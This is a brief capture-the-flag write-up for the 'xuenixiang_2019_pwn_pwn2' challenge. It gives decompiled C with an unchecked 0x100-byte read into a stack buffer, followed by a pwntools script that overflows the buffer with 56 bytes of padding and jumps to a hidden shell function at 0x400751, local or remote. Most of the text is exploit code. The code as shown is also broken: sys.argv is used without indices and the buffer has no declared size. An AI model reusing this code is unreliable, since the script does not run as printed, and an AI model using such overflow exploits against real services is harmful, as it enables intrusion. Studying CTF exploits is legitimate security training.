xuenixiang_2019_pwn_pwn2 wp by kone
exp:#-*- coding:utf-8 -*-
"""
// xuenixiang_2019_pwn_pwn2: https://www.xuenixiang.com/ctfexercise-competition-320.html
int get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
return system("cat flag");
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // BYREF
memset(s, 0, sizeof(s));
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("say something?");
read(0, s, 0x100uLL);
puts("oh,that's so boring!");
return 0;
}
"""
from pwn import *
import sys
if len(sys.argv) == 2:
p = process(sys.argv)
elif len(sys.argv) == 3:
p = remote(sys.argv, sys.argv)
else:
print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
exit(1)
offset = 56
payload = offset * 'A' + p64(0x400751) + p64(0x400751)
p.sendafter("say something?", payload)
p.interactive()
页:
[1]